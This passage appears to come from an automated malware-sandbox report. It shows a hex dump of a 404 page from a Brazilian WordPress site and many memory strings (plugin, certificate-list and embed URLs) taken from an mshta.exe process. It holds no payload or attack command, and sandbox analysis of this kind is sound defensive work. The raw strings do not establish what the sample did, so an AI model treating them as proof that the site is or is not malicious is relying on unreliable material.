2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 46 61 63 65 78 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 26 72 61 71 75 6f 3b 20 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 46 61 63 65 78 20 43 6f 6d c3 a9 72 63 69 6f 20 45 78 74 65 72 69 6f 72 20 4c 74 64 61 2e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 7
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Aug 2022 09:53:26 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"Content-Type: text/html; charset=UTF-8X-Varnish: 21588395Age: 0Via: 1.1 varnish-v4Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 30 30 31 30 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 36 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 46 61 63 65 78 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 26 72 61 71 75 6f 3b 20 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 46 61 63 65 78 20 43 6f 6d c3 a9 72 63 69 6f 20 45 78 74 65 72 69 6f 72 20 4c 74 64 61 2e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 7
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: https://www.youtube.com/watch?v=:id equals www.youtube.com (Youtube)
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: html.attr( 'src', '//www.youtube.com/embed/' + video.id + '?autoplay=1&rel=0&v=' + video.id ); equals www.youtube.com (Youtube)
Source: mshta.exe, 00000008.00000003.1042217541.0000000004A73000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1175274565.0000000004A77000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1042392174.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1042304907.0000000004A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: //www.youtube.com/embed//player?autoplay=true equals www.youtube.com (Youtube)
Source: mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000008.00000002.1174137645.0000000004822000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036116238.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \//www.youtube.com/embed/%id%?autoplay=1//player.vimeo.com/video/%id%?autoplay=1 equals www.youtube.com (Youtube)
Source: mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: jquery.mousewheel.min[1].js.8.drString found in binary or memory: http://adomas.org/javascript-mouse-wheel/
Source: jquery.mousewheel.min[1].js.8.drString found in binary or memory: http://brandonaaron.net)
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmp, swfobject[1].js.8.drString found in binary or memory: http://code.google.com/p/swfobject/
Source: mshta.exe, 00000008.00000003.937402502.00000000003AB000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drString found in binary or memory: http://creativecommons.org/licenses/by/3.0/
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: animate-logo[1].css.8.drString found in binary or memory: http://daneden.me/animate
Source: jquery.magnific-popup.min[1].js.8.drString found in binary or memory: http://dimsemenov.com/plugins/magnific-popup/
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextra.com.br/wp-includes/certificates/4
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.c
Source: mshta.exe, 00000008.00000003.969628382.0000000006417000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/-
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/aQ
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/ae
Source: mshta.exe, 00000008.00000002.1180622886.0000000006417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/q
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/css/banner-rotator.css?ver=4.9.20
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/css/banner-rotator.css?ver=4.9.20M
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/css/caption.css?ver=4.9.20
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/css/caption.css?ver=4.9.200.NET4.0E)
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20)
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20r=4.
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.flashblue-plugins.js?ver=4.9.20
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.flashblue-plugins.js?ver=4.9.20.
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/che
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167157736.000000000023E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/css/parallax.css?ver=1.0.0
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/css/parallax.css?ver=1.0.0.NET4.0E)
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.00E)ry(
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0ET4.0E)re
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0crollTop
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0ry(
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0.NET4.0E)&
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0.NET4.0E)J
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.00C;
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.04.0E)
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0S
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0er=3.0.6
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0h(
Source: mshta.exe, 00000008.00000002.1170406636.00000000031F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0http://facextr
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.600B
Source: mshta.exe, 00000008.00000002.1180809282.0000000006454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6Jp
Source: mshta.exe, 00000008.00000002.1170406636.00000000031F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6htt
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6i
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6veO
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170406636.00000000031F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1h9
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1la
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1s?
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167349641.0000000000292000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/flexslider.css?ver=2.2.0
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/fonts/flexslider-icon.eo
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170406636.00000000031F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquery.flexslider-min.js
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/lexslider-min.js?ver=2.2
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177426727.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/elasti-carousel/jquery.elastislide.
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3.0ks
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3C:
Source: mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3er=1.0.
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3f
Source: mshta.exe, 00000008.00000003.1039289175.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1038970768.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174869500.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1039338109.0000000004A25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1039407918.0000000004A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3http://
Source: mshta.exe, 00000008.00000002.1177855943.000000000538D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.carousel.css?ver=1
Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.theme.css?ver=1.24
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3
Source: mshta.exe, 00000008.00000002.1167157736.000000000023E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3.NET4.0E
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3C:
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.30E)ementI
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.30E)nsla#
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3e-banner
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3op:0
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1180809282.0000000006454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/arrow_down.png
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/arrow_down.pngpng0
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/arrow_down.pngs/bootstrap.min.js?ver=2.3.0
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1180809282.0000000006454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.png
Source: mshta.exe, 00000008.00000002.1180809282.0000000006454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.png$
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.png5501425981.pngn.js.3.0
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20
